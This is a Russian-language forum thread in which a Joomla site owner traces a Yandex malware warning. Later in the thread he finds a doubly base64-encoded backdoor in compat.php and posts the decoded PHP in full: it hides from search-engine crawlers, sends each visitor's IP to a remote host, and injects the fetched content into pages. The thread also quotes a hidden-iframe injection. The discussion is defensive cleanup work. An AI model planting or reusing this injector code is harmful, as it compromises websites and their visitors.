Вредоносный код - Безопасность сайтов на Joomla

Всем привет.
Вчера в панели Яндекс вебмастера появилось сообщение о том, что на сайте вредоносный код. Пока в списке зараженных станиц только одна страница. В результатах поиска сайт выводится с пометкой «Этот сайт может угрожать безопасности вашего компьютера».
Сам я в исходном коде ничего подозрительного не нашел. Все скрипты которые есть это реклама  и 2 сервиса статистики. Яндекс Метрика и Google Аналитикс. Больше никаких скриптов нет. Онлайн проверка доктор веба тоже пишет, что вирусов нет.
Ни в исходном коде ни в файле шаблона ничего подозрительного перечисленного тут не нашел.
Единственное, что у знакомой аваст ругается и пишет что ан сайте вирус, мой почему то молчит.



Где искать это гзип? или можно вообще все, что есть на сайте удалить?

Ну для начала прогоните свой сайт каким то сервисом на наличие внешних запросов. Похоже он у вас с какого то адреса тянет фрейм. Вот и проверьте к каким адресам он отправляет запрос.

это реклама 

Не Вы первый, кто пострадал от низкокачественной рекламы, которая подгружается в i-frame

Ну для начала прогоните свой сайт каким то сервисом на наличие внешних запросов. Похоже он у вас с какого то адреса тянет фрейм. Вот и проверьте к каким адресам он отправляет запрос.

Каким например?

Не Вы первый, кто пострадал от низкокачественной рекламы, которая подгружается в i-frame

Нет не реклама.  У меня реклама без i-frame. Я же написал, что в коде ничего такого вообще нет.

Каким например?

site-perf.com

site-perf.com

А там что-то дополнительно надо выбирать? Нажал я Go выдал он мне результаты зугрузки. Там где список URL только урлы с картинками и 2 скрпита на сервисы статистики.

Ну как это, вы же говорили даже что у вас реклама есть. и что? она у вас не тянется с каких то других ресурсов:?

Ну как это, вы же говорили даже что у вас реклама есть. и что? она у вас не тянется с каких то других ресурсов:?

Реклама есть, но этот сервис видит всего 2 скрипта. Могу скрин сделать или адрес сайта в личку кинуть.

Вот адрес сайта в личку было бы именно оно.

Товарищи! Я снова с этой же проблемой. Яндекс уже 3 раз пишет, что у меня на сайте вирус. После второго раза, я вновь написал им письмо и получил ответ.

В настоящий момент с Вашим сайтом все в порядке, пометка в выдаче снялась, проверьте, пожалуйста. Задержка была вызвана техническими проблемами с нашей стороны, приносим свои искренние извинения за доставленные неудобства.

Вредоносный код, обнаруженный на сайте, был прописан после элемента <div id="header-wrapper">, и выглядел следующим образом:

[iframe src="h**p://abrabr.co.cc/f/jldtjuc.php?n=24234" width="0" height="0" frameborder="0"></iframe][div id="header"]

Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах script изменены во избежание случайного срабатывания кода.

Но самое интерсное, что я на сайте ничего не менял. Только вот после этого раза начал реагировать мой антивирус, но не всегда. Около 5 раз такое было. Антивирус на сайт конечно же не пускал. Поэтому исходный код я глянуть не мог. Но после обновления страницы все было ок. Вирус прям какой-то динамический.

Вот скрин антивируса

А дату модификации сайтов проверяли? Какие файлы модифицировались непосредственно перед обнаружением сигнала?

А дату модификации сайтов проверяли? Какие файлы модифицировались непосредственно перед обнаружением сигнала?

Нет не проверял. И теперь уже не проверю. Я удалял сайт и заливал бэкап. Но не помогло.

Нет не проверял. И теперь уже не проверю. Я удалял сайт и заливал бэкап. Но не помогло.

Так не бывает. Если залит "чистый" бекап, то почему сохраняется собщение о вредоносном коде?

Так не бывает. Если залит "чистый" бекап, то почему сохраняется собщение о вредоносном коде?

Он видимо не чистый. Первый раз то было еще 29 декабря. Потом перепроверка яндекса, показала, что все ок. Я думал вируса не было. Просто глюк. А потом опять. Я же говорю скрипт не всегда в коде. И антивирус ругался всего раз 5.

Он видимо не чистый. Первый раз то было еще 29 декабря. Потом перепроверка яндекса, показала, что все ок. Я думал вируса не было. Просто глюк. А потом опять. Я же говорю скрипт не всегда в коде. И антивирус ругался всего раз 5.

Ну как это скрипт не в коде! Ну что то же его вызывает, даже если он извне

Ну как это скрипт не в коде! Ну что то же его вызывает, даже если он извне

Я имею ввиду, если смотреть исходный код сайта, то скрипт там не всегда.

Нашел. В libraries\joomla\utilities\compat\compat.php был base64_decode внутри которого еще один base64_decode.

Нашел. В libraries\joomla\utilities\compat\compat.php был base64_decode внутри которого еще один base64_decode.

Ради интереса - то, что внутри, раскодировать не пытались? Когда у меня было подобное - я раскодировал, оказался какой то рассыльщик, толко чего и куда - я так и не разобрался

К слову, у меня предпоследнее массовое заражение файлов было около года назад, я замучался тогда чистить. Особенно неприятно было то, что это случилось, когда я был в командировке - восстанавливал с какого то ужасного местного вай фая, который все время рвался. Так что часть восстановил копированием из бекапа, часть вычистил руками. Вроде бы все вычистил окончательно И вдруг через год (!), на этой неделе, я чищу уже совсем другой вирус, который вписывал скрипт вниз файла, и обнаруживаю, что в маленьких галереях картинок, которые я вставлял в новости (мамбот их строил) есть папка (в каждой галерее),  в которой лежат кешированные превьшки  картинок. Их там очень много, в каждой. Помню, что я заглянул в эти папки год назад, увидел кучу кешей, и решил что тут ничего быть не может. А оказалось, что в каждой в конце есть файл index.php, в котрой преспокойно сидит до сих пор тот самый base64_decode ... и т.д. - все тело скрипта.

Раскодировал конечно. Только долго не мог понять, что это пока не увидел второй base64_decode в котором был закодирован адрес сайта.
Если интересно то вот

Раскодировал конечно. Только долго не мог понять, что это пока не увидел второй base64_decode в котором был закодирован адрес сайта.
Если интересно то вот

Код

if(function_exists("ob_start") && !function_exists("lbw_ecjs") && !function_exists("pat_pinp") && !function_exists("zxkc_lhw") && !isset($GLOBALS["aa"]) && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"msnbot") === false && @strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"yahoo") === false && !isset($_COOKIE["vrve"]) ){$GLOBALS["aa"] = 1;setcookie("vrve", 1, time()+3600*24*2, "/"); function pat_pinp($gzencode_arg) { $x = @ord(@substr($gzencode_arg, 3, 1)); $shift = 10; $shift2 = 0; if( $x&4 ) { $unpack=@unpack("v", substr($gzencode_arg, 10, 2)); $unpack=$unpack[1]; $shift+= 2 + $unpack; } if( $x&8 ) { $shift = @strpos($gzencode_arg, chr(0), $shift) + 1; } if( $x&16 ) { $shift = @strpos($gzencode_arg, chr(0), $shift) + 1; } if( $x&2 ) { $shift += 2; } $gzip = @gzinflate(@substr($gzencode_arg, $shift)); if($gzip === FALSE) { $gzip = $gzencode_arg; } return $gzip; } function zxkc_lhw( $url ) { /* if (function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 5); $curl_result = curl_exec ($ch); curl_close($ch); if ($curl_result) return $curl_result; } if (@ini_get("allow_url_fopen")) { $file_result = @file_get_contents($url); if ($file_result) return $file_result; } */ $url_info = parse_url($url); $query = "GET $url HTTP/1.0\r\n"; $query .= "Host: " . $url_info["host"] . "\r\n"; $query .= "Connection: Close\r\n\r\n"; $fp = @fsockopen($url_info["host"], 80, $errno, $errstr, 5); if (!$fp) return false; @fputs($fp, $query); @socket_set_timeout ($fp, 5, 0); $s_retcode = @substr (@fgets ($fp, 4096), 9, 3); if ($s_retcode{0} <> "2") {return FALSE;} while (! @feof ($fp)) { if ("\r\n" === @fgets ($fp, 4096)) {break;} } $socket_result = ""; while (! @feof ($fp)) { $socket_result .= @fgets ($fp, 4096); } @fclose($fp); if ($socket_result) return $socket_result; } function lbw_ecjs($pts){return preg_replace("#(.*||[^<>]*]*>|)#is", "$1" . ujq_pkpu, pat_pinp($pts), 1);}$ujq_pkpu=zxkc_lhw(base64_decode("aHR0cDovL2djb3VudGVyLmNuL2luZm8ucGhw"). "?i=" . $_SERVER["REMOTE_ADDR"] . "&s=" . $_SERVER["HTTP_HOST"]);@preg_match("#(.*)#", $ujq_pkpu, $matches);$ujq_pkpu= isset($matches[1])? $matches[1] : "";if ($ujq_pkpu) {define("ujq_pkpu",$ujq_pkpu); ob_start("lbw_ecjs");}}

Все равно че то сходу не понял

Да я сам не понял, что он делает. По закодированному адресу сайта понял, что это вирус. Ну а позже догадался с другого сайта сравнить файл)

Отдал вирус спецу нашему, пусть копается

Отдал вирус спецу нашему, пусть копается

Хорошо. Напишите тогда, как он разберется. Самому интересно.